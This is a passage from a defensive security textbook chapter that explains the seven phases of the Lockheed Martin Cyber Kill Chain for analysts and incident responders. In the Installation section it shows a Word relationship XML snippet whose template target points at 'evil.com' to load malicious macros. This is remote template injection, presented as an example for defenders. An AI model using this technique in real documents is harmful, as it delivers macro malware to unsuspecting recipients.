The Lockheed Martin Cyber Kill Chain
Lockheed Martin is a United States technology company in the Defense Industrial Base (DIB) that, among other things, created a response model to identify activities that an adversary must complete to successfully complete a campaign. This model was one of the first to hit the mainstream that provided analysts, operators, and responders with a way to map an adversary's campaign. This mapping provided a roadmap that, once any adversary activity was detected, outlined how far into the campaign the adversary had gotten, what actions had not been observed yet, and (during incident recovery) what defensive technology, processes, or training needed to be prioritized.
An important note regarding the Lockheed Martin Cyber Kill Chain: it is a high-level model that is used to illustrate adversary campaign activity. Many tactics and techniques can cover multiple phases, so as we discuss the model below, the examples will be large buckets instead of specific tactical techniques. Some easy examples of this would be supply chain compromises and abusing trust relationships. These are fairly complex techniques that can be used for a lot of different phases in a campaign (or chained between campaigns or phases). Fear not, we'll look at a more specific model (the MITRE ATT&CK framework) in the next chapter.
Figure 1.3 – Lockheed Martin's Cyber Kill Chain
The Kill Chain is broken into seven phases:
- Reconnaissance
- Weaponization
- Delivery
- Exploitation
- Installation
- Command & Control
- Actions on the Objective
Let's look at each of them in detail in the following sections.
Reconnaissance
The Reconnaissance phase is performed when the adversary is mapping out their target. This phase is performed both actively and passively through network and system enumeration, social media profiling, identifying possible vulnerabilities, identifying the protective posture (to include the security teams) of the targeted network, and identifying what the target has that may be of value (Does your organization have something of value such as intellectual property? Are you a part of the DIB? Are you part of a supply chain that could be used for a further compromise, personally identifiable/health information (PII/PHI)?).
Weaponization
Weaponization is one of the most expensive parts of the Kill Chain for the adversary. This is when they must go into their arsenal of tools, tactics, and techniques and identify exactly how they are going to leverage the information they collected in the previous phase to achieve their objectives. It's a potentially expensive phase that doesn't leave much room for error. Do they use their bleeding-edge zero-day exploits (that is, exploits that have not been previously disclosed), thus making them unusable in other campaigns? Do they try to use malware, or do they use a Living-Off-the-Land Binary (LOLBin)? Do too much and they're wasting their resources needed (personnel, capital, and time) to develop zero-days and complex malware, but too little and they risk getting caught and exposing their attack vehicle.
This phase is also where adversaries acquire infrastructure, both to perform the initial entry, stage and launch payloads, perform command and control, and if needed, locate an exfiltration landing spot. Depending on the complexity of the campaign and skill of the adversary, infrastructure is either stolen (exploiting and taking over a benign website as a launch/staging point) or purchasing infrastructure. Frequently, infrastructure is stolen because it is easier to blend in with normal network traffic for a legitimate website. Additionally, when you steal infrastructure, you don't have to put out any money for things that can be traced back to the actor (domain registrations, TLS certificates, hosting, and so on).
Delivery
This phase is where the adversary makes their attempt to get into the target network. Frequently, this is attempted through phishing (generic, spear-, or whale-phishing, or even through social media). However, this can also be attempted through an insider, a hardware drop (the oddly successful thumb drive in a parking lot), or a remotely exploitable vulnerability.
Generally, this is the riskiest part of a campaign as it is the first time that the adversary is "reaching out and touching" their target with something that could tip off defenders that an attack is incoming.
Exploitation
This phase is performed when the adversary actually exploits the target and executes code on the system. This can be through the use of an exploit against a system vulnerability, the user, or any combination of the lot. An exploit against a system vulnerability is fairly self-explanatory – this either needs to be carried out by tricking the user into opening an attachment or link that executes an exploit condition (Arbitrary Code Execution (ACE)) or an exploit that needs to be remotely exploitable (Remote Code Execution (RCE)).
The Exploitation phase is generally the first time that you may notice adversary activity as the Delivery phase relies on organizations getting data, such as email, into their environment. While there are scanners and policies to strip out known bad, adversaries are very successful in using email as an initial access point, so the Exploitation phase is frequently where the first detection occurs.
Installation
This phase is when an initial payload is delivered as a result of the exploitation of the weaponized object that was delivered to the target. Installation generally has multiple sub-phases, such as loading multiple tools/droppers onto the target that will assist in maintaining a good foothold onto the system, to avoid the adversary losing a valuable piece of malware (or other malicious logic) to a lucky anti-virus detection.
As an example, the exploit may be to get a user to open a document that loads a remote template that includes a macro. When the document is opened, the remote template is loaded and brings the macro with it over TLS. Using this example, the email with the attachment looked like normal correspondence and the adversary didn't have to risk losing a valuable macro-enabled document to an email or anti-virus scanner:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="ird4"
Type=http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate
Target="file:///C:\Users\admin\AppData\Roaming\Microsoft\Templates\GoodTemplate.dotm?raw=true"
Targetmode="External"/></Relationships>
In the preceding snippet, we can see a normal Microsoft Word document template. Specifically take note of the Target="file:///" section, which defines the local template (GoodTemplate.dotm). In the following snippet, an adversary, using the same Target= syntax, is loading a remote template that includes malicious macros. This process of loading remote templates is allowed within the document standards, which makes it a prime candidate for abuse:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="ird4"
Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
Target="https://evil.com/EvilTemplate.dotm?raw=true" Targetmode="External"/></Relationships>
This can go on for several phases, each iteration being more and more difficult to track, using encryption and obfuscation to hide the actual payload that will finally give the adversary sufficient cover and access to proceed without concern for detection.
As a real-world example, during an incident, I observed an adversary use an encoded PowerShell script to download another encoded PowerShell script from the internet, decode it, and that script then downloaded another encoded PowerShell script, and so on, to eventually download five encoded PowerShell scripts, at which point the adversary believed they weren't being tracked (spoiler: they were).
Command & Control
The Command & Control (C2) phase is used to establish remote access over the implant, and ensure that it is able to evade detection and persist through normal system operation (reboots, vulnerability/anti-virus scans, user interaction with the system, and so on).
Other phases tend to move fairly quickly; however, with advanced adversaries, the Installation and C2 phases tend to slow down to avoid detection, often remaining dormant between phases or sub-phases (sometimes using the multiple dropper downloads technique described previously).
Actions on the Objective
This phase is when the adversary performs the true goal of their intrusion. This can be the end of the campaign or the beginning of a new phase. Traditional objectives can be anything from loading annoying adware, deploying ransomware, or exfiltrating sensitive data. However, it is important to remember that this access itself could be the objective, with the implants sold to bad actors on the dark/deep web who could use them for their own purposes.
As noted, this can launch into a new campaign phase and begin by restarting from the Reconnaissance phase from within the network to collect additional information to dig deeper into the target. This is common with compromises of Industrial Control Systems (ICSes) – these systems aren't (supposed to be) connected to the internet, so frequently you have to get onto a system that does access the internet and then use that as a foothold to access the ICS, thus starting a new Kill Chain process.
Our job as analysts, operators, and responders is to push the adversary as far back into the chain as possible to the point that the expense of attacking outweighs the value of success. Make them pay for every bit they get into our network and it should be the last time they get in. We should identify and share every piece of infrastructure we detect. We should analyze and report every piece of malware or LOLBin tactic we uncover. We should make them burn zero-day after zero-day exploit, only for us to detect and stop their advance. Our job is to make the adversary work tremendously hard to make any advance in our network.